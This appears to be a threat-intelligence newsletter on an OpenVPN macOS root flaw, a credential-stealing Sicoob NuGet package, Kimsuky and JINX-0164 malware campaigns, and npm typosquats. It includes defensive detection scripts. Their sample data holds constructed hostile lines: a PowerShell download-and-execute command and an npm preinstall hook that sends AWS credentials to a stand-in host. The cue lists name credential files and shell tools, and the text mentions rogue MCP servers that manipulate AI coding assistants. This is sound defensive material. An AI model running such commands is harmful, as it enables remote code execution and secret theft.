Trending Topics

TRENDING TOPICS MAY 29, 2026

Critical OpenVPN Connect macOS Flaw Lets Local Attackers Gain Root Access

A critical vulnerability in OpenVPN Connect for macOS, tracked as CVE-2026-9560, allowed local users to gain full root privileges by abusing the app's privileged helper component. The issue affected versions 3.5.1 through 3.8.1: the background helper that manages VPN connections handled the local inter-process communication it exposes insecurely, so a local attacker could send it crafted messages that it would act on with root rights.

The flaw carries a CVSS score of 9.4: successful exploitation gives an attacker complete control over a Mac with OpenVPN Connect installed, including the ability to install additional malware, disable security tools, or tamper with VPN configurations. It was discovered and responsibly reported by researchers Ismael Esquilichi, Pablo Redondo, and Lê Đức Ninh, and is fixed in OpenVPN Connect version 3.8.2 for macOS.

The 3.8.2 release also corrects two additional bugs: certain trailing characters in server URLs could break web-based authentication, and profile switching sometimes triggered blank profile imports or crashes during migration.

Users and enterprises should upgrade to 3.8.2 promptly. Because the bug is a local privilege escalation, "local attacker" includes any malware already running under a standard user account, not only a person at the keyboard, so the exposure is greatest on shared or managed Macs where a low-privilege foothold can be turned into root and used to tamper with the very VPN configuration the endpoint relies on.
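A fleet check for the affected range, added here as an example and not code from OpenVPN or from the advisory. It assumes the standard bundle location /Applications/OpenVPN Connect.app and reads CFBundleShortVersionString from its Info.plist; the point worth noting is that versions are compared as numeric tuples, because a plain string comparison would rank a hypothetical 3.10.0 below 3.8.1 and misreport it.

```python
"""Check whether the installed OpenVPN Connect build falls in 3.5.1 .. 3.8.1.

Added example (not OpenVPN's code). Assumes the default app path and the
standard macOS bundle layout.
"""
from __future__ import annotations

import plistlib
from pathlib import Path

APP_PLIST = Path("/Applications/OpenVPN Connect.app/Contents/Info.plist")  # assumed location
AFFECTED_MIN = (3, 5, 1)   # first affected version per the advisory
FIXED = (3, 8, 2)          # first fixed version


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '3.8.1' into (3, 8, 1).

    Numeric tuples order correctly; comparing the raw strings would put
    '3.10.0' before '3.8.1'. A pre-release suffix such as '-beta' is dropped.
    """
    core = text.strip().split("-")[0]
    return tuple(int(part) for part in core.split("."))


def is_affected(version: str) -> bool:
    """True when the installed version is inside the vulnerable range."""
    v = parse_version(version)
    return AFFECTED_MIN <= v < FIXED


def installed_version(plist_path: Path = APP_PLIST) -> str | None:
    """Read the bundle version, or None when the app is not installed."""
    if not plist_path.exists():
        return None
    with plist_path.open("rb") as fh:
        return plistlib.load(fh).get("CFBundleShortVersionString")


if __name__ == "__main__":
    ver = installed_version()
    if ver is None:
        print("OpenVPN Connect not found")
    else:
        print(f"OpenVPN Connect {ver}: {'UPGRADE to 3.8.2' if is_affected(ver) else 'ok'}")
```

Run it through your MDM's script facility or over SSH; a non-zero count of "UPGRADE" results is the list of hosts where a standard user account is one IPC message away from root.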

Malicious Sicoob NuGet Package Steals Banking Credentials And Targets Cloud Secrets

A malicious NuGet package posing as a legitimate C# SDK for Brazilian banking cooperative Sicoob has been caught stealing sensitive authentication material from developers, turning routine API integration into a potential banking heist. Labeled Sicoob.Sdk and downloaded nearly 500 times, versions 2.0.0 through 2.0.4 quietly exfiltrated client IDs, PFX certificates, and PFX passwords to a hard-coded Sentry endpoint whenever developers instantiated the SicoobClient class with production credentials.

Because these PFX certificates underpin automated operations like Pix instant payments and dynamic QR code generation, any compromised material could allow attackers to impersonate a business in Sicoob's banking network and abuse payment flows at scale. Researchers also found that the package captured raw Boleto API responses, potentially exposing transaction details, amounts, due dates, and payer or payee data that could feed downstream fraud or data leakage.

To appear trustworthy, the threat actor maintained a clean GitHub repository that excluded the malicious code entirely, slipping the data-stealing logic only into the NuGet artifact. That source-to-package mismatch is a deliberate exploitation of the trust developers place in open-source ecosystems - and it is easy to miss. Reviewing the repository therefore proves nothing about what was installed; only the published .nupkg, and the assembly restored from it, reflects the code that actually runs.

NuGet has since blocked Sicoob.Sdk and the "sicoob" publisher profile, which listed 11 additional packages with around 6,000 combined downloads. Organizations that installed any version of the package should remove it immediately, treat all associated PFX material as compromised, replace certificates, rotate passwords, update client IDs, and review Sicoob API logs for suspicious activity.
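A triage helper for the response steps above, added as an example and not code from the researchers or from NuGet. It does two things a responder would want: it walks the local NuGet global-packages cache for the affected Sicoob.Sdk versions, and it opens any .nupkg (which is a zip archive) and searches every file inside for a hard-coded Sentry DSN, the channel the package used for exfiltration. The regex follows Sentry's documented DSN shape (scheme://public_key@host/project_id); the cache path default and the sample package built inline are constructed for illustration, not the real artifact.

```python
"""Find cached Sicoob.Sdk versions and hard-coded Sentry DSNs inside .nupkg files.

Added example (not the researchers' or NuGet's code). The sample package is
constructed; NUGET_PACKAGES is the environment variable NuGet honours for
the global-packages folder, with ~/.nuget/packages as the default.
"""
from __future__ import annotations

import io
import os
import re
import zipfile
from pathlib import Path

PACKAGE_ID = "sicoob.sdk"                     # cache folders are lower-cased package ids
AFFECTED = {"2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4"}
NUGET_CACHE = os.environ.get("NUGET_PACKAGES") or os.path.expanduser("~/.nuget/packages")

# Sentry DSN: https://<hex public key>@<host ending in sentry.io>/<project id>
SENTRY_DSN = re.compile(rb"https?://[0-9a-f]{16,}@[\w.-]+sentry\.io/\d+")


def affected_cached_versions(cache: str | Path = NUGET_CACHE) -> list[str]:
    """Return affected Sicoob.Sdk versions present in the global cache."""
    pkg_dir = Path(cache) / PACKAGE_ID
    if not pkg_dir.is_dir():
        return []
    return sorted(p.name for p in pkg_dir.iterdir() if p.name in AFFECTED)


def sentry_dsns_in_nupkg(nupkg: bytes | str | Path) -> dict[str, list[str]]:
    """Map each file inside the package to the Sentry DSNs found in it.

    .NET assemblies keep string literals as UTF-16LE, so each file is checked
    both as raw bytes and after a UTF-16LE decode. A bank SDK has no reason
    to carry a telemetry DSN at all, so any hit is worth a look.
    """
    source = io.BytesIO(nupkg) if isinstance(nupkg, bytes) else nupkg
    hits: dict[str, list[str]] = {}
    with zipfile.ZipFile(source) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            found = set(SENTRY_DSN.findall(data))
            found |= set(SENTRY_DSN.findall(data.decode("utf-16-le", "ignore").encode()))
            if found:
                hits[name] = sorted(f.decode() for f in found)
    return hits


def build_sample_nupkg() -> bytes:
    """Constructed stand-in for a malicious .nupkg (NOT the real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Sicoob.Sdk.nuspec",
                    "<package><id>Sicoob.Sdk</id><version>2.0.3</version></package>")
        # mimic an assembly: PE header bytes followed by a UTF-16LE string literal
        literal = "https://0123456789abcdef0123456789abcdef@o000000.ingest.sentry.io/1234567"
        zf.writestr("lib/netstandard2.0/Sicoob.Sdk.dll",
                    b"MZ\x90\x00" + literal.encode("utf-16-le"))
    return buf.getvalue()


if __name__ == "__main__":
    print("cached affected versions:", affected_cached_versions())
    for path, dsns in sentry_dsns_in_nupkg(build_sample_nupkg()).items():
        print(f"{path}: {dsns}")
```

Point sentry_dsns_in_nupkg at the .nupkg files under the cache (each version folder keeps one) and at build-server restore caches as well; a finding in any package, not just Sicoob.Sdk, is a reason to diff the artifact against its claimed source before trusting it.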

This discovery arrives alongside a separate cluster of 14 malicious npm packages typosquatting popular OpenSearch, Elasticsearch, DevOps, and configuration libraries to harvest AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD secrets via preinstall hooks. Taken together with recent waves of npm payloads abusing postinstall scripts, dependency confusion, and ad monetization, these campaigns illustrate a broader shift in attacker strategy - from opportunistic typosquatting toward what Sonatype calls "manufactured legitimacy": package names, scopes, and versions crafted to look entirely routine inside modern development workflows.

For defenders, the implication is that no open-source package should be implicitly trusted based on name recognition or download count. Securing software supply chains now requires continuous monitoring for source-to-package mismatches, credential exfiltration behavior, and suspicious lifecycle scripts - before any of that code reaches a production pipeline.

Kimsuky Deploys HTTPSpy And Supercharges Its Espionage Toolkit

North Korean state-sponsored group Kimsuky, also known as Velvet Chollima or APT43, is hitting South Korean military and corporate targets with a refreshed HTTPSpy campaign that uses fake security software sites and spoofed Webex pages to quietly hijack endpoints. In attacks observed through March and April 2026, the group disguised its droppers as installers for a South Korean B2B messaging service and as a fraudulent Cisco Webex troubleshooting page, tricking victims into running JSE-based droppers that pull multi-stage payloads via PowerShell and ultimately deploy the HTTPSpy remote access trojan.

HTTPSpy provides full-featured control of compromised systems - command execution, file upload and download, screenshot capture, process injection, and self-deletion - giving Kimsuky a resilient foothold in sensitive networks. Researchers note that the group has gone beyond simple malware delivery, wiring in real-time infection checks through mechanisms like JSONPing and using stolen meeting schedules to redirect victims into legitimate Webex rooms so the lure looks authentic.

The same cluster of activity shows Kimsuky expanding its arsenal by delivering multiple malware families via JSE, PIF, SCR, and EXE droppers, split broadly between the PebbleDash and AppleSeed lines. New PebbleDash-linked tools include HelloDoor, a Rust-based backdoor likely assisted by large language models, plus HttpMalice and HttpTroy - both capable of reconnaissance, command execution, in-memory payload loading, screenshot capture, reverse shells, and extensive cleanup to remove traces.

On the AppleSeed side, Kimsuky is doubling down on data theft. AppleSeed Spy variants harvest documents, screenshots, keystrokes, USB drive listings, and certificates from the C:\GPKI directory, mirroring capabilities previously seen in Troll Stealer. HappyDoor, a long-running AppleSeed offshoot first seen in 2021, remains active and reflects the group's practice of maintaining source code access and iterating on it over time.

Kaspersky further highlights Kimsuky's growing use of legitimate infrastructure - Visual Studio Code Remote Tunneling, Cloudflare Quick Tunnels, and the DWAgent remote monitoring tool - to establish covert remote access that blends into normal IT operations rather than relying on classic command-and-control channels.

Taken together, these campaigns point to a threat actor with broad access to its original codebase, a willingness to experiment with Rust and Go tooling, and overlapping targets spanning defense, military, government, medical, machinery, and energy sectors in South Korea and beyond. PebbleDash operations have already reached defense organizations in Brazil and Germany, while AppleSeed continues to focus primarily on government entities.

For defenders, Kimsuky's blend of social engineering, staged loaders, living-off-the-land tunnels, and evolving backdoors is a concrete reminder to scrutinize even "legitimate" remote access channels, harden against script-based droppers, and closely monitor certificate stores and GPKI paths for signs of targeted exfiltration.
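A process-tree detection for the JSE-dropper-to-PowerShell stage described in this item, added as an example and not code from Kaspersky or from the article. It consumes process-creation events in a simplified JSON shape constructed here to resemble Sysmon Event ID 1 fields (pid, ppid, image, cmd); the events are not real telemetry, the script-extension list and PowerShell cue words are this example's own heuristics, and 127.0.0.1 stands in for whatever staging host a real dropper would contact.

```python
"""Flag a Windows Script Host process started with a script file that spawns PowerShell.

Added example (not Kaspersky's code). SAMPLE_EVENTS is constructed; the
real campaign's file names and hosts are not reproduced here.
"""
from __future__ import annotations

import json
import re
import sys

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_FILE = re.compile(r"\.(?:jse|js|vbs|vbe|wsf)(?![a-z0-9])")   # heuristic extension list
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                 "net.webclient", "frombase64string", "-enc")

# Constructed events: a user double-clicks a fake troubleshooting "installer"
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 900, "image": "C:\\Windows\\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 4212, "ppid": 4100, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmd": 'wscript.exe "C:\\Users\\kim\\Downloads\\Webex_Troubleshoot.jse"'},
    {"pid": 4230, "ppid": 4212,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://127.0.0.1/stage2')\""},
    {"pid": 4300, "ppid": 4100, "image": "C:\\Windows\\System32\\cscript.exe",
     "cmd": 'cscript.exe "C:\\Scripts\\logon.vbs"'},          # benign: no PowerShell child
    {"pid": 4310, "ppid": 4100,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe Get-Date"},                        # benign: parent is explorer
]


def basename(image: str) -> str:
    """Executable name from a Windows or POSIX path, lower-cased."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[dict]:
    """One finding per PowerShell process whose parent is a script host
    that was itself launched with a script file on its command line."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in PS_HOSTS:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        if not SCRIPT_FILE.search(parent["cmd"].lower()):
            continue
        cmd = e["cmd"].lower()
        cues = [c for c in DOWNLOAD_CUES if c in cmd]   # download/decode behaviour raises severity
        findings.append({
            "parent_pid": parent["pid"],
            "child_pid": e["pid"],
            "script": parent["cmd"],
            "cues": cues,
            "severity": "high" if cues else "medium",
        })
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:   # path to a JSON-lines export of process events
        with open(sys.argv[1], encoding="utf-8") as fh:
            events = [json.loads(line) for line in fh if line.strip()]
    else:
        events = SAMPLE_EVENTS
    for finding in detect(events):
        print(json.dumps(finding))
```

The parent/child pairing is the durable part of this rule: droppers rename their script files freely, but a .jse opened by wscript.exe that immediately spawns PowerShell is rare in legitimate workflows, and the download cues only decide how loudly to alert.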

JINX-0164 Uses LinkedIn Lures To Drop Custom macOS Infostealer On Crypto Firms

A newly identified threat actor, tracked as JINX-0164, is targeting cryptocurrency organizations through fake recruiter outreach on LinkedIn, virtual meeting invites, and bespoke macOS malware designed to steal digital assets. Active since at least mid-2025 and motivated by financial gain, the group targets developers and engineers - using recruitment-themed social engineering to move from a single compromised laptop into CI/CD pipelines and code distribution systems, where they can tamper with source code and siphon crypto wallet credentials.

In the attack chain detailed by researchers, victims first receive messages from credible-looking LinkedIn profiles offering interviews, then are directed to a rogue domain impersonating a teleconferencing provider that prompts them to download a "meeting client". That installer pulls down a bash script from a fake Apple driver store domain; the script in turn fetches an architecture-aware payload (the build matching the host CPU) posing as a system audio driver named coreaudiod, the name of macOS's legitimate audio daemon, saves it as ChromeUpdater, and loads it via launchctl.

The payload is a Python-based macOS infostealer and remote access trojan dubbed AUDIOFIX. Once active, it harvests password manager entries, browser and iCloud Keychain credentials, SSH keys, console histories, cryptocurrency wallet extensions and addresses, and live Discord, Slack, and Telegram sessions. It also supports manual reconnaissance, file exfiltration, shell command execution, and additional payload retrieval.
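A launchd persistence check for the chain described above, added as an example and not code from the researchers. It parses property lists from the standard LaunchAgents and LaunchDaemons folders and flags jobs whose program carries one of the names reported in the campaign or runs from a place a system daemon never should. The sample plist is constructed, and the watched names, trusted prefixes, and suspect prefixes are this example's own heuristics rather than indicators published with the report.

```python
"""Triage launchd jobs for the ChromeUpdater / fake-coreaudiod persistence pattern.

Added example (not the researchers' code). SAMPLE_PLIST is constructed;
the real coreaudiod lives at /usr/sbin/coreaudiod.
"""
from __future__ import annotations

import os
import plistlib
from pathlib import Path

PLIST_DIRS = [
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
    Path(os.path.expanduser("~/Library/LaunchAgents")),
]
WATCHED_NAMES = {"chromeupdater", "coreaudiod"}           # names used by the campaign
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/", "/Applications/")
SUSPECT_PREFIXES = ("/tmp/", "/var/tmp/", "/private/tmp/", "/Users/Shared/")


def program_path(plist: dict) -> str | None:
    """launchd accepts either Program or ProgramArguments[0]."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def assess(plist: dict) -> list[str]:
    """Return the reasons a launchd job looks suspicious (empty == nothing found)."""
    reasons: list[str] = []
    prog = program_path(plist)
    if not prog:
        return ["no program specified"]
    name = Path(prog).name.lower()
    if name == "coreaudiod":
        if prog != "/usr/sbin/coreaudiod":
            reasons.append("coreaudiod outside /usr/sbin")
    elif name in WATCHED_NAMES:
        reasons.append(f"watched program name {name}")
    # hidden directories ("/.cache/") and temp folders are where droppers like to hide
    if prog.startswith(SUSPECT_PREFIXES) or "/." in prog:
        reasons.append(f"runs from suspect location {prog}")
    elif not prog.startswith(TRUSTED_PREFIXES):
        reasons.append(f"runs from non-system location {prog}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive (starts at login and restarts if killed)")
    return reasons


def scan(dirs=PLIST_DIRS) -> dict[str, list[str]]:
    """Map plist path -> reasons, for every job that raised at least one."""
    findings: dict[str, list[str]] = {}
    for d in dirs:
        for path in Path(d).glob("*.plist"):
            try:
                with path.open("rb") as fh:
                    reasons = assess(plistlib.load(fh))
            except Exception as exc:          # an unreadable plist is itself worth a look
                reasons = [f"unparseable: {exc}"]
            if reasons:
                findings[str(path)] = reasons
    return findings


# Constructed sample modelled on the reported chain (not a recovered artifact)
SAMPLE_PLIST = {
    "Label": "com.apple.coreaudiod",
    "ProgramArguments": ["/Users/dev/.cache/ChromeUpdater"],
    "RunAtLoad": True,
    "KeepAlive": True,
}

if __name__ == "__main__":
    print(assess(SAMPLE_PLIST))
    for path, why in scan().items():
        print(path, why)
```

Expect the "non-system location" reason to fire on legitimate per-user agents (updaters, sync clients), so pair it with an allowlist of known vendor paths; the other reasons are specific enough to page on.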

JINX-0164 does not stop at LinkedIn lures. The group also weaponized the JavaScript ecosystem by pushing a compromised version of the @velora-dex/sdk npm package - a legitimate DeFi library - that silently installed a Go-based backdoor known as MiniRAT on macOS systems. MiniRAT allows attackers to upload files, run arbitrary commands, and pull additional tooling from attacker-controlled servers, turning a normal development dependency into a bridgehead into crypto trading infrastructure.

While aspects of the campaign - including its focus on cryptocurrency, VPN usage, and spoofed domains - resemble patterns associated with North Korean clusters such as BlueNoroff, current evidence shows no direct infrastructure overlaps. JINX-0164 is currently treated as a distinct, financially driven actor that combines social media phishing, macOS-specific malware, and software supply chain abuse to reach high-value crypto targets.

For security teams at cryptocurrency and DeFi organizations, this campaign is a reminder that the attack surface now includes LinkedIn inboxes, developer dependencies, and macOS endpoints - not just traditional network perimeters.

Typosquatted npm Packages Used To Steal Cloud and CI/CD Secrets

Security researchers have uncovered a live supply chain campaign in which a single threat actor published dozens of typosquatted npm packages designed to quietly steal cloud and CI/CD credentials from developer environments and build pipelines. The malicious packages closely mimic popular OpenSearch and Elasticsearch configuration and DevOps libraries, then use preinstall scripts and custom infostealer code to harvest AWS, Azure, and GCP credentials, HashiCorp Vault tokens, npm tokens, and other environment secrets before exfiltrating them to attacker-controlled infrastructure.

Once in possession of those secrets, the attacker can pivot into CI workflows, cloud accounts, and private repositories - tampering with code, implanting backdoors, or abusing cloud resources at will.

This campaign fits a broader pattern of npm supply chain abuse that includes worm-like behavior: stolen tokens are used to inject malicious dependencies into additional repositories and GitHub Actions workflows, turning compromised developers and projects into new propagation points. Some variants go further, tampering with local configurations for AI coding assistants by inserting a rogue Model Context Protocol server designed to trick those tools into exfiltrating sensitive local files and secrets.

Typosquatting has evolved well beyond simple lookalike naming. These are now multi-stage operations that blend credential theft, CI takeover, and AI toolchain manipulation into a single campaign. For organizations, that means enforcing strict dependency policies, monitoring for suspicious lifecycle scripts, and treating any newly published or unfamiliar npm package as a potential risk until it can be verified otherwise.
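A lifecycle-script audit for the npm campaigns in this item and the preinstall-hook cluster mentioned under the Sicoob item, added as an example and not code from the researchers or from npm. It walks a node_modules tree, reads each package.json, and reports every package that registers an install-time hook, ranking it by cues matching what these stealers do: shell out, read environment variables or cloud credential files, decode base64, or run inline node. The cue lists and the sample manifests are constructed for illustration.

```python
"""Report npm packages with install-time hooks and score the hook bodies.

Added example (not the researchers' or npm's code). SAMPLES are constructed
manifests, not the packages named in the report.
"""
from __future__ import annotations

import json
import re
from pathlib import Path

HOOKS = ("preinstall", "install", "postinstall", "prepare")
CUES = {
    "shell-out": re.compile(r"\b(curl|wget|sh -c|bash -c|child_process|execSync)\b"),
    "secrets": re.compile(r"(process\.env|AWS_|\.aws/credentials|VAULT_TOKEN|NPM_TOKEN|\.npmrc|GITHUB_TOKEN)"),
    "obfuscation": re.compile(r"(base64|fromCharCode|\\x[0-9a-f]{2}|eval\()"),
    "inline-node": re.compile(r"\bnode\s+-e\b"),
}
SCRIPT_FILE = re.compile(r"[\w./-]+\.(?:js|mjs|sh)")


def audit_manifest(pkg: dict) -> dict | None:
    """Return a finding for a manifest with install hooks, else None."""
    scripts = pkg.get("scripts") or {}
    hooks = {h: scripts[h] for h in HOOKS if h in scripts}
    if not hooks:
        return None
    cues = set()
    for body in hooks.values():
        for label, rx in CUES.items():
            if rx.search(body):
                cues.add(label)
    # a hook that only runs a file hides its behaviour in that file: list it for review
    files = [f for body in hooks.values() for f in SCRIPT_FILE.findall(body)]
    return {
        "name": pkg.get("name", "?"),
        "version": pkg.get("version", "?"),
        "hooks": hooks,
        "cues": sorted(cues),
        "script_files": files,
        "severity": "high" if cues else "review",
    }


def audit_tree(root: str | Path) -> list[dict]:
    """Audit every package.json below a node_modules directory."""
    findings = []
    for manifest in Path(root).rglob("package.json"):
        try:
            pkg = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        finding = audit_manifest(pkg)
        if finding:
            finding["path"] = str(manifest.parent)
            findings.append(finding)
    return findings


# Constructed manifests (not the real packages)
SAMPLES = [
    {"name": "opensearch-confgi", "version": "1.0.3",
     "scripts": {"preinstall": "node -e \"require('child_process').execSync("
                               "'curl -s -d @$HOME/.aws/credentials http://127.0.0.1/c')\""}},
    {"name": "build-helper", "version": "9.0.0",
     "scripts": {"postinstall": "node scripts/build.js"}},
    {"name": "lodash", "version": "4.17.21", "scripts": {"test": "echo ok"}},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_manifest(sample))
    for finding in audit_tree("node_modules"):
        print(finding["severity"], finding["name"], finding["version"], finding["cues"])
```

The audit only helps if the hooks have not already run, so install with scripts disabled (npm config set ignore-scripts true, or npm ci --ignore-scripts), review the findings, and re-enable scripts only for the packages that genuinely need a build step.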

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics.

Written By: William Elchert
